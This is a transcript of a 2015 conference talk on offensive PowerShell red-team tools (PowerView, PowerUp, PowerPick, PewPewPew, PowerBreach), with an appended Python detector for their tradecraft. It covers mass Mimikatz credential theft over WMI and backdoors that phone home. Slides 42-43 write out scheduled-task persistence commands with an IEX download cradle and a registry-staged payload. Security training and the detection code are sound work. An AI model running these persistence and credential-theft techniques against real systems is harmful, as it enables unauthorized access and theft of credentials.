Drilling deeper with Veil's PowerTools


This presentation covers Veil's PowerTools, a set of offensive PowerShell tools. It was presented at CarolinaCon '11 on 3/20/2015.


  1. Drilling Deeper with Veil’s PowerTools
     Justin Warner, Will Schroeder
     Veris Group’s Adaptive Threat Division
  2. @sixdub
     ◎ Pentester and red teamer for the Adaptive Threat Division of Veris Group
     ◎ Lots of interests: red team ops, reverse engineering, adversarial tactics, etc.
     ◎ Developer on the Veil-Framework and co-founder of Veil’s PowerTools
  3. @harmj0y
     ◎ Security researcher and red teamer for the Adaptive Threat Division of Veris Group
     ◎ Co-founder of the Veil-Framework and founder of Veil’s PowerTools
     ◎ Cons: Shmoocon, CarolinaCon, Defcon, Derbycon, various BSides
  4. tl;dr
     ◎ Introduction
     ◎ PowerView
     ◎ PowerUp
     ◎ PowerPick
     ◎ PewPewPew
     ◎ PowerBreach
     ◎ Dear M$
     ◎ Demos
     ◎ Questions
  5. Introduction: How We Got Here
  6. The Veil-Framework
     ◎ An offensive toolkit aimed at bridging the gap between pentesting and red teaming capabilities
     ◎ Started with the release of Veil-Evasion
       ○ expanded with Catapult, Pillage, and PowerView
     ◎ CarolinaCon 2014 - “The Veil-Framework”
  7. Veil’s PowerTools
     ◎ All of our offensive PowerShell work from the Veil-Framework (and other projects) was pulled into the new PowerTools repo
     ◎ PowerTools will remain the primary source for all PowerShell work, with the Veil repo containing offensive Python projects
  8. Sidenote: Why PowerShell
     ○ PowerShell provides (out of the box):
       □ Full .NET access
       □ application whitelisting
       □ direct access to the Win32 API
       □ ability to execute purely in memory
       □ default installation Win7+ !
     ○ “Why I Choose PowerShell as an Attack Platform”
       □ Choose-PowerShell.html
  9. “Bad Guys”
  10. PowerShell: “Microsoft’s Post-Exploitation Language”
      - @obscuresec
  11. PowerView: Domain Situational Awareness
  12. Background
      ◎ Think dsquery on steroids... and cocaine
      ◎ First started because a client banned “net” commands on domain machines
      ◎ Otherwise initially inspired by Rob Fuller’s netview.exe tool
        ○ Wanted something more flexible that also didn’t drop a binary to disk
  13. User Hunting
      ◎ Goal: find which domain machines specific users are logged into
      ◎ Invoke-UserHunter: finds where target users or group members are logged in on the network
      ◎ Invoke-StealthUserHunter: extracts user homeDirectories from AD, then gets sessions on all of those file servers to hunt for targets
        ○ Significantly less traffic than Invoke-UserHunter
  14. Offensive Event Parsing
      ◎ Once you get DA, domain controller event logs make it trivial to track down user locations
      ◎ PowerView’s Get-UserLogonEvents lets you easily extract account logon events (4624) from a host
      ◎ Invoke-UserEventHunter wraps this all up into a weaponized form
  15. Domain Trusts
      ◎ PowerView can now enumerate and exploit existing domain trusts:
        ○ Get-NetDomainTrusts, Get-NetForestDomains
      ◎ Most PowerView functions now accept a “-Domain <name>” flag, allowing them to operate across trusts
        ○ e.g. Get-NetUsers -Domain sub.test.local
      ◎ Invoke-MapDomainTrusts can recursively map all reachable trusts from a foothold
  16. Data Mining
      ◎ PowerView’s Invoke-ShareFinder -CheckAccess can find all shares readable by the current user
      ◎ Invoke-FileFinder can search a network for open file shares, or take a share list from Invoke-ShareFinder
      ◎ Spits out a .csv of found files, sortable by creation or last access times
  17. PowerUp: Automating Windows Privesc
  18. Background
      ◎ On past assessments, had to escalate privileges on a locked down workstation
      ◎ Kernel exploits wouldn’t work, so fell back to vulnerable service binaries
      ◎ More or less did everything manually, wanted something a bit easier
        ○ Started implementing the “Encyclopedia of Privesc”
  19. Windows Services
      ◎ One of the most effective escalation vectors was (and still is) vulnerable Windows services
        ○ Sometimes you can modify a service itself
        ○ Get-ServicePerms will check for these
      ◎ However, many organizations overlook the permissions for service binaries :)
        ○ Use Get-ServiceEXEPerms, then overwrite the service binary to add a local user or install an agent
  20. .DLL Hijacking
      ◎ Many programs/services will search in multiple locations when loading, including directories listed in the PATH environment variable
      ◎ If you have write access to any folder in PATH, there’s a good chance you can drop a malicious DLL and escalate privileges
        ○ Invoke-FindPathHijack will search for these opportunities
  21. PowerUp
      ◎ Automates everything we’ve talked about, and more
      ◎ Invoke-AllChecks will run all current checks against a host
      ◎ Functions exist to abuse most of the escalation vectors found
  22. PowerPick: Lock Picking the AppLocker
  23. Background
      ◎ Incident responders are recognizing and targeting PowerShell.exe
        ○ Had a client write HIPS rules against psh_psexec, YA, for reals
      ◎ We wanted to be prepared for more situations like this
      ◎ Developed PowerPick as a combination of solutions to run PowerShell without powershell.exe
  24. Bypassing the Blacklist
      ◎ Used assemblies in .NET/C# to execute code
        ○ System.Management.Automation
      ◎ Developed SharpPick
        ○ powershell-a-red-teamers-tale-of-overcoming-simple-applocker-policies/
      ◎ To defeat this with a blacklist policy (not ideal), you must permission off or block DLLs in the Global Assembly Cache (GAC)
        ○ C:\Windows\Assembly\*
  25. OH BTW
  26. Runspaces in Unmanaged Code
      ◎ SharpPick wasn’t very sexy
        ○ Binary on disk = Lame!
      ◎ Lee Christensen (@tifkin_) authored “UnmanagedPowerShell” to utilize .NET assemblies from C
        ○ Uses the CLR and a custom .NET assembly in memory
        ○ werShell
      ◎ Transformed this code into a reflective DLL = ReflectivePick
  27. PowerShell Inception = Injection!!
      ◎ Decided it needed more PowerShell
      ◎ Embedded ReflectivePick into Invoke-ReflectivePEInjection from PowerSploit by @josephbialek
        ○ Created Invoke-PSInjector
      ◎ Injects a DLL into a remote process that runs PowerShell code
  28. ReflectivePick Diagram
      (diagram; components shown: *.exe, Invoke-PSInjector, ReflectivePick, .NET Assembly, Download Cradle)
  29. Invoke-PowerCeption?
  30. PewPewPew: Launching Lazerz at your Targets
  31. Invoke-Mass*
      ◎ Model to run PowerShell scripts on a mass number of machines and retrieve results:
        1. A jobbified webserver is kicked off in the background which serves out a specified PowerShell file
        2. An IEX() one-liner is executed on machines through WMI to download/execute the hosted code
        3. Results are POSTed back to the local webserver
  32. Invoke-MassMimikatz
      ◎ Executes PowerSploit’s Invoke-Mimikatz on multiple machines without PSRemoting
      ◎ Raw Mimikatz results are saved on the pivot host
      ◎ Result files are parsed and Server:Credential objects are output to the pipeline
  33. Invoke-MassMimikatz
  34. Invoke-MassSearch
      ◎ Microsoft has another gift for attackers, the Windows Search Indexing Service
        ○ Why search through all of a system’s files when Windows does this for you?
      ◎ Invoke-MassSearch performs the same pattern as Invoke-MassMimikatz
        ○ allows you to query the search indexer across machines where you have admin access
  35. PowerBreach: New Release
  36. Background
      ◎ One obvious gap remaining in the workflow of Veil PowerTools
      ◎ Motivation: offense in depth theory
      ◎ Wanted multiple easy ways to remain resident on the compromised systems
        ○ Memory only
  37. PowerBreach
      ◎ Yes… More PowerShell
        ○ Why not utilize our favorite scripting language?!
      ◎ Goal: automate a bunch of techniques/tools to backdoor a system
      ◎ Multiple triggers, various host/network signatures
        ○ We will show some of the “cool” ones
  38. Invoke-EventLogBackdoor
      ◎ Based on Shmoocon 2013 “Wipe The Drive” by Jake Williams (@MalwareJake)
      ◎ Uses Get-WinEvent to monitor Windows event logs for failed RDP attempts
      ◎ When it recognizes the “trigger” username, phones home to the attacker
        ○ With an IEX(...) download cradle
  39. Invoke-PortKnockBackdoor
      ◎ Based upon Get-Packet by Robbie Foust
        ○ Uses to create raw socket
        ○ Uses socket.iocontrol to make it promiscuous
      ◎ Promiscuously sniffs traffic on the system and inspects data for a “magic” trigger value
        ○ UDP, TCP, ICMP
  40. Invoke-DeadUserBackdoor
      ◎ A common action of attackers is to add domain/local users
      ◎ Uses ADSI to monitor for a user’s existence
      ◎ If the user is not found, assumes the worst and phones home
  41. Invoke-ResolverBackdoor
      ◎ Attempts to be a little stealthier and usable on external assessments
      ◎ Resolves a specified DNS name on an interval, and if the resolution doesn’t equal a predefined IP...
      ◎ … PHONE HOME TO THAT IP!
  42. Persistence… If you must
      ◎ Focuses more on non-persistent backdoors
      ◎ Scheduled tasks seem to work really well for PowerShell in domain networks:
        schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -NonI -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://server/script.ps1'''))'" /sc onlogon /ru System
  43. Registry Storage
      ◎ Better yet, stage your script in the registry!
        $backdoor = "write-host 123"
        Set-ItemProperty -Path 'HKLM:\HARDWARE' -Name 'secret' -Value $backdoor
        schtasks /create /tn Updater /tr "powershell -c 'IEX (gp HKLM:\HARDWARE secret).secret'" /sc onlogon /ru System
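Defender-side counterpart to the Invoke-Mass* model (slide 31) and the scheduled-task and registry-staged persistence (slides 42 and 43): a small classifier, added here and not part of PowerTools, run over constructed process-creation and task-creation records. The event IDs, the parent-image field and the regexes are my own assumptions about what an endpoint log would carry; the sample records are made up.

```python
import re

# Constructed sample records (not real Windows events): (event id, parent image,
# command line). 4688 = process creation, 4698 = scheduled task created.
SAMPLE_EVENTS = [
    (4688, "WmiPrvSE.exe",
     "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://server/script.ps1')\""),
    (4698, "svchost.exe",
     "powershell -c 'IEX (gp HKLM:\\HARDWARE secret).secret'"),
    (4688, "explorer.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
    (4688, "WmiPrvSE.exe", "cmd.exe /c ipconfig"),
]

# Indicators taken from the techniques on the slides: an IEX download cradle,
# a script pulled out of a registry value, and hidden/non-interactive flags.
POWERSHELL = re.compile(r"powershell(\.exe)?\b", re.I)
CRADLE = re.compile(r"\bIEX\b.*?(DownloadString|WebClient)", re.I)
REG_STAGED = re.compile(r"\bIEX\b.*?\b(gp|Get-ItemProperty)\b.*?\bHK(LM|CU):", re.I)
HIDDEN_FLAGS = re.compile(r"-(w\s+hidden|windowstyle\s+hidden|noni\w*|nop\w*)", re.I)

def classify(event_id, parent_image, cmdline):
    """Return the reasons a record matches the slides' tradecraft ([] if none)."""
    reasons = []
    if not POWERSHELL.search(cmdline):
        return reasons
    if CRADLE.search(cmdline):
        reasons.append("download cradle")
    if REG_STAGED.search(cmdline):
        reasons.append("script staged in registry")
    if HIDDEN_FLAGS.search(cmdline):
        reasons.append("hidden/non-interactive flags")
    # Invoke-Mass* fires its one-liner over WMI, so the PowerShell child
    # shows up under WmiPrvSE.exe rather than under an interactive shell.
    if event_id == 4688 and parent_image.lower() == "wmiprvse.exe":
        reasons.append("spawned by WMI")
    # A task action that already looked suspicious is a persistence hit.
    if event_id == 4698 and reasons:
        reasons.append("scheduled task persistence")
    return reasons

def scan(events):
    """Map each flagged command line to its list of reasons."""
    hits = {}
    for event_id, parent_image, cmdline in events:
        reasons = classify(event_id, parent_image, cmdline)
        if reasons:
            hits[cmdline] = reasons
    return hits
```

The plain `-File` invocation under explorer.exe and the non-PowerShell WMI child both come back clean, so the value is in the combination of indicators rather than any single one.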
  44. So what?
      ◎ Nothing revolutionary here!
      ◎ Nothing worse than owning a system and not being able to get back on later!
      ◎ Real power comes when combining PowerTools
        ○ PewPewPew with PowerBreach
  45. 2 Cents: Almost ready for the show!
  46. Obligatory Defense Slide
      ◎ HIPS and whitelisting generally help endpoint defense
      ◎ Enterprise incident response capabilities
        ○ These are memory-only capabilities, but the scripts (“malware”) can be easily recovered and analyzed
      ◎ Need a clear way to restrict PowerShell & .NET assemblies to certain users
  47. True Story…
  48. Demos
  49. Questions?
      ◎ Justin
        ○ @sixdub
        ○ justin [at]
      ◎ Will
        ○ @harmj0y
        ○ will [at]